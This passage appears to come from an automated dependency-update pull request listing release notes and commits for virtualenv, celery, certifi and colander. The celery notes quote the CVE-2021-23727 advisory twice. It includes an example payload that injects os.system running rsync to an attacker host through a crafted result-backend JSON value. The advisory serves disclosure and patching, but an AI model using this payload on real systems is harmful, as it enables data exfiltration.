href=\"https://redirect.github.com/pypa/virtualenv/pull/2742\"\u003epypa/virtualenv#2742\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix whitespace around backticks in changelog by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2751\"\u003epypa/virtualenv#2751\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTest latest Python 3.13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2752\"\u003epypa/virtualenv#2752\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix typo in Nushell activation script by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2754\"\u003epypa/virtualenv#2754\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGitHub Actions: Replace deprecated macos-12 with macos-13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2756\"\u003epypa/virtualenv#2756\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2728\"\u003e#2728\u003c/a\u003e: Activating venv create unwanted console output  by \u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade bundled wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2760\"\u003epypa/virtualenv#2760\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.2 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2724\"\u003epypa/virtualenv#2724\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump embeded wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2741\"\u003epypa/virtualenv#2741\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/blob/main/docs/changelog.rst\"\u003evirtualenv's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev20.26.6 (2024-09-27)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.6\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- Properly quote string placeholders in activation script templates to mitigate\n  potential command injection - by :user:`y5c4l3`. (:issue:`2768`)\n\u003ch2\u003ev20.26.5 (2024-09-17)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.5\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade embedded wheels: setuptools to \u003ccode\u003e75.1.0\u003c/code\u003e from \u003ccode\u003e74.1.2\u003c/code\u003e - by :user:\u003ccode\u003egaborbernat\u003c/code\u003e. (:issue:\u003ccode\u003e2765\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.4 (2024-09-07)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.4\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- no longer create `()` output in console during activation of a virtualenv by .bat file. (:issue:`2728`)\n- Upgrade embedded wheels:\n\u003cul\u003e\n\u003cli\u003ewheel to \u003ccode\u003e0.44.0\u003c/code\u003e from \u003ccode\u003e0.43.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.2\u003c/code\u003e from \u003ccode\u003e24.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e74.1.2\u003c/code\u003e from \u003ccode\u003e70.1.0\u003c/code\u003e (:issue:\u003ccode\u003e2760\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.3 (2024-06-21)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.3\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eUpgrade embedded wheels:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e70.1.0\u003c/code\u003e from \u003ccode\u003e69.5.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.1\u003c/code\u003e from \u003ccode\u003e24.0\u003c/code\u003e (:issue:\u003ccode\u003e2741\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.2 (2024-05-13)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.2\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- ``virtualenv.pyz`` no longer fails when zipapp path contains a symlink - by :user:`HandSonic` and :user:`petamas`. (:issue:`1949`)\n- Fix bad return code from activate.sh if hashing is disabled - by :user:'fenkes-ibm'. (:issue:`2717`)\n\u003ch2\u003ev20.26.1 (2024-04-29)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.1\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ec04726d065372ffad9920998aef1ce41252a61d\"\u003e\u003ccode\u003eec04726\u003c/code\u003e\u003c/a\u003e release 20.26.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/86dddeda7c991f8529e1995bbff280fb7b761972\"\u003e\u003ccode\u003e86ddded\u003c/code\u003e\u003c/a\u003e Fix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2771\"\u003e#2771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/6bb3f6226c18d69bb6cfa3475b6d46dd463bb530\"\u003e\u003ccode\u003e6bb3f62\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2769\"\u003e#2769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/220d49c2e3ade2ed24f5712ab5a23895cde2e04c\"\u003e\u003ccode\u003e220d49c\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.10.1 to 1.10.2 (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2767\"\u003e#2767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/cf340c83c2828a92def78c77b3e037a2baa4d557\"\u003e\u003ccode\u003ecf340c8\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2766\"\u003e#2766\u003c/a\u003e from pypa/release-20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/f3172b4da576b88275a14d2e7bbeb98b8f958a05\"\u003e\u003ccode\u003ef3172b4\u003c/code\u003e\u003c/a\u003e release 20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/22b9795eb6bed0c17d0415c5513eca099a0a11ad\"\u003e\u003ccode\u003e22b9795\u003c/code\u003e\u003c/a\u003e Use uv over pip (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2765\"\u003e#2765\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/35d8269aba12a1e3c60183a2082b2c4d0cc1192f\"\u003e\u003ccode\u003e35d8269\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2764\"\u003e#2764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ee77feb77ccb3c5deefa318630c59315bcfda521\"\u003e\u003ccode\u003eee77feb\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2763\"\u003e#2763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/c5160566293ed098ca30e0856dbf44588dd5c3a3\"\u003e\u003ccode\u003ec516056\u003c/code\u003e\u003c/a\u003e Update README.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/virtualenv/compare/12.0.2...20.26.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `celery` from 3.1.19 to 5.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/releases\"\u003ecelery's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.2.2\u003c/h2\u003e\n\u003cp\u003eRelease date: 2021-12-26 16:30 P.M UTC+2:00\u003c/p\u003e\n\u003cp\u003eRelease by: Omer Katz\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eVarious documentation fixes.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix CVE-2021-23727 (Stored Command Injection security\nvulnerability).\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eWhen a task fails, the failure information is serialized in the\nbackend. In some cases, the exception class is only importable\nfrom the consumer's code base. In this case, we reconstruct the\nexception class so that we can re-raise the error on the process\nwhich queried the task's result. This was introduced in \u003ca href=\"https://redirect.github.com/celery/celery/issues/4836\"\u003e#4836\u003c/a\u003e. If\nthe recreated exception type isn't an exception, this is a\nsecurity issue. Without the condition included in this patch, an\nattacker could inject a remote code execution instruction such as:\n\u003ccode\u003eos.system(\u0026quot;rsync /data attacker@192.168.56.100:~/data\u0026quot;)\u003c/code\u003e by\nsetting the task's result to a failure in the result backend with\nthe os, the system function as the exception type and the payload\n\u003ccode\u003ersync /data attacker@192.168.56.100:~/data\u003c/code\u003e as the exception\narguments like so:\u003c/p\u003e\n\u003cpre lang=\"python\"\u003e\u003ccode\u003e{\n      \u0026quot;exc_module\u0026quot;: \u0026quot;os\u0026quot;,\n      'exc_type': \u0026quot;system\u0026quot;,\n      \u0026quot;exc_message\u0026quot;: \u0026quot;rsync /data attacker@192.168.56.100:~/data\u0026quot;\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eAccording to my analysis, this vulnerability can only be exploited\nif the producer delayed a task which runs long enough for the\nattacker to change the result mid-flight, and the producer has\npolled for the task's result. The attacker would also have to\ngain access to the result backend. The severity of this security\nvulnerability is low, but we still recommend upgrading.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003cp\u003eRelease date: 2021-11-16 8.55 P.M UTC+6:00\u003c/p\u003e\n\u003cp\u003eRelease by: Asif Saif Uddin\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix rstrip usage on bytes instance in ProxyLogger.\u003c/li\u003e\n\u003cli\u003ePass logfile to ExecStop in celery.service example systemd file.\u003c/li\u003e\n\u003cli\u003efix: reduce latency of AsyncResult.get under gevent (\u003ca href=\"https://redirect.github.com/celery/celery/issues/7052\"\u003e#7052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eLimit redis version: \u0026lt;4.0.0.\u003c/li\u003e\n\u003cli\u003eBump min kombu version to 5.2.2.\u003c/li\u003e\n\u003cli\u003eChange pytz\u0026gt;dev to a PEP 440 compliant pytz\u0026gt;0.dev.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/blob/main/Changelog.rst\"\u003ecelery's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.2.2\u003c/h1\u003e\n\u003cp\u003e:release-date: 2021-12-26 16:30 P.M UTC+2:00\n:release-by: Omer Katz\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eVarious documentation fixes.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix CVE-2021-23727 (Stored Command Injection security vulnerability).\u003c/p\u003e\n\u003cp\u003eWhen a task fails, the failure information is serialized in the backend.\nIn some cases, the exception class is only importable from the\nconsumer's code base. In this case, we reconstruct the exception class\nso that we can re-raise the error on the process which queried the\ntask's result. This was introduced in \u003ca href=\"https://redirect.github.com/celery/celery/issues/4836\"\u003e#4836\u003c/a\u003e.\nIf the recreated exception type isn't an exception, this is a security issue.\nWithout the condition included in this patch, an attacker could inject a remote code execution instruction such as:\n\u003ccode\u003eos.system(\u0026quot;rsync /data attacker@192.168.56.100:~/data\u0026quot;)\u003c/code\u003e\nby setting the task's result to a failure in the result backend with the os,\nthe system function as the exception type and the payload \u003ccode\u003ersync /data attacker@192.168.56.100:~/data\u003c/code\u003e as the exception arguments like so:\u003c/p\u003e\n\u003cp\u003e.. code-block:: python\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e  {\n        \u0026quot;exc_module\u0026quot;: \u0026quot;os\u0026quot;,\n        'exc_type': \u0026quot;system\u0026quot;,\n        \u0026quot;exc_message\u0026quot;: \u0026quot;rsync /data attacker@192.168.56.100:~/data\u0026quot;\n  }\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eAccording to my analysis, this vulnerability can only be exploited if\nthe producer delayed a task which runs long enough for the\nattacker to change the result mid-flight, and the producer has\npolled for the task's result.\nThe attacker would also have to gain access to the result backend.\nThe severity of this security vulnerability is low, but we still\nrecommend upgrading.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _version-5.2.1:\u003c/p\u003e\n\u003ch1\u003e5.2.1\u003c/h1\u003e\n\u003cp\u003e:release-date: 2021-11-16 8.55 P.M UTC+6:00\n:release-by: Asif Saif Uddin\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix rstrip usage on bytes instance in ProxyLogger.\u003c/li\u003e\n\u003cli\u003ePass logfile to ExecStop in celery.service example systemd file.\u003c/li\u003e\n\u003cli\u003efix: reduce latency of AsyncResult.get under gevent (\u003ca href=\"https://redirect.github.com/celery/celery/issues/7052\"\u003e#7052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eLimit redis version: \u0026lt;4.0.0.\u003c/li\u003e\n\u003cli\u003eBump min kombu version to 5.2.2.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/b21c13d234dd6d6c197436374ab1bb5db4be62c7\"\u003e\u003ccode\u003eb21c13d\u003c/code\u003e\u003c/a\u003e Bump version: 5.2.1 → 5.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/a60b4867f4bd4efa4b5a2834fcf3f757740b1b8f\"\u003e\u003ccode\u003ea60b486\u003c/code\u003e\u003c/a\u003e Add changelog for 5.2.2.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/3e5d630f478518eb775c05ba87b29024400fbe68\"\u003e\u003ccode\u003e3e5d630\u003c/code\u003e\u003c/a\u003e Fix changelog formatting.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/1f7ad7e6df1e02039b6ab9eec617d283598cad6b\"\u003e\u003ccode\u003e1f7ad7e\u003c/code\u003e\u003c/a\u003e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/2d8dbc2a8087bbb60590465031ebd5138b8eb359\"\u003e\u003ccode\u003e2d8dbc2\u003c/code\u003e\u003c/a\u003e Update configuration.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/9596abad9060323d85d3945d8637b3cafadfefa2\"\u003e\u003ccode\u003e9596aba\u003c/code\u003e\u003c/a\u003e Fix typo in documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/639ad83239a1f9cfc58ee9852a1f107f96d3c1a1\"\u003e\u003ccode\u003e639ad83\u003c/code\u003e\u003c/a\u003e update doc to reflect Celery 5.2.x (\u003ca href=\"https://redirect.github.com/celery/celery/issues/7153\"\u003e#7153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/d32356c0e46eefecd164c55899f532c2fed2df57\"\u003e\u003ccode\u003ed32356c\u003c/code\u003e\u003c/a\u003e Bump version: 5.2.0 → 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/6842a786eeeb2d0f1fcd66408b72924b39e07836\"\u003e\u003ccode\u003e6842a78\u003c/code\u003e\u003c/a\u003e Merge branch 'master' of \u003ca href=\"https://github.com/celery/celery\"\u003ehttps://github.com/celery/celery\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/4c92cb745f658382a4eb4b94ba7938d119168165\"\u003e\u003ccode\u003e4c92cb7\u003c/code\u003e\u003c/a\u003e changelog for v5.2.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/celery/celery/compare/v3.1.19...v5.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2015.9.6.2 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2015.09.06.2...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `colander` from 1.0 to 1.7.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Pylons/colander/blob/main/CHANGES.rst\"\u003ecolander's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.7.0 (2019-02-01)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eThe URL validator regex has been updated to no longer be vulnerable to a\ncatastrophic backtracking that would have led to an infinite loop. See\n\u003ca href=\"https://redirect.github.com/Pylons/colander/pull/323\"\u003ePylons/colander#323\u003c/a\u003e and\n\u003ca href=\"https://redirect.github.com/Pylons/colander/issues/290\"\u003ePylons/colander#290\u003c/a\u003e. With thanks to Przemek\n(\u003ca href=\"https://github.com/p-m-k\"\u003ehttps://github.com/p-m-k\u003c/a\u003e).\u003c/p\u003e\n\u003cp\u003eThis does change the behaviour of the URL validator and it no longer supports\n\u003ccode\u003efile://\u003c/code\u003e URI scheme (\u003ca href=\"https://tools.ietf.org/html/rfc8089\"\u003ehttps://tools.ietf.org/html/rfc8089\u003c/a\u003e). Users that\nwish to validate \u003ccode\u003efile://\u003c/code\u003e URI's should change their validator to use\n\u003ccode\u003ecolander.file_uri\u003c/code\u003e instead.\u003c/p\u003e\n\u003cp\u003eIt has also dropped support for alternate schemes outside of http/ftp (and\ntheir secure equivelants). Please let us know if we need to relax this\nrequirement.\u003c/p\u003e\n\u003cp\u003eCVE-ID: CVE-2017-18361\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eThe Email validator has been updated to use the same regular expression that\nis used by the WhatWG HTML specification, thereby increasing the email\naddresses that will validate correctly from web forms submitted. See\n\u003ca href=\"https://redirect.github.com/Pylons/colander/pull/324\"\u003ePylons/colander#324\u003c/a\u003e and\n\u003ca href=\"https://redirect.github.com/Pylons/colander/issues/283\"\u003ePylons/colander#283\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eNumber once again will allow you to serialize None to colander.null, this\nreverts an accidental revert. See\n\u003ca href=\"https://redirect.github.com/Pylons/colander/issues/204#issuecomment-459556100\"\u003ePylons/colander#204\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eInteger SchemaType now supports an optional \u003ccode\u003estrict\u003c/code\u003e mode that will\nvalidate that the number is an integer, rather than silently accepting floats\nand truncating. See \u003ca href=\"https://redirect.github.com/Pylons/colander/pull/322\"\u003ePylons/colander#322\u003c/a\u003e and\n\u003ca href=\"https://redirect.github.com/Pylons/colander/issues/292\"\u003ePylons/colander#292\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.6.0 (2019-01-31)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eSupport custom format strings on \u003ccode\u003eDateTime\u003c/code\u003e and \u003ccode\u003eDate\u003c/code\u003e fields.\nSee \u003ca href=\"https://redirect.github.com/Pylons/colander/pull/318\"\u003ePylons/colander#318\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport sub-second precision on \u003ccode\u003eTime\u003c/code\u003e fields if provided.\nSee \u003ca href=\"https://redirect.github.com/Pylons/colander/pull/319\"\u003ePylons/colander#319\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFormat Python code of \u003ccode\u003ecolander\u003c/code\u003e to conform to the PEP 8 style guide.\nAdd some linters (\u003ccode\u003eflake8\u003c/code\u003e, \u003ccode\u003eblack\u003c/code\u003e and other) into \u003ccode\u003etox.ini\u003c/code\u003e.\nSee \u003ca href=\"https://redirect.github.com/Pylons/colander/pull/320\"\u003ePylons/colander#320\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.5.1 (2018-09-10)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 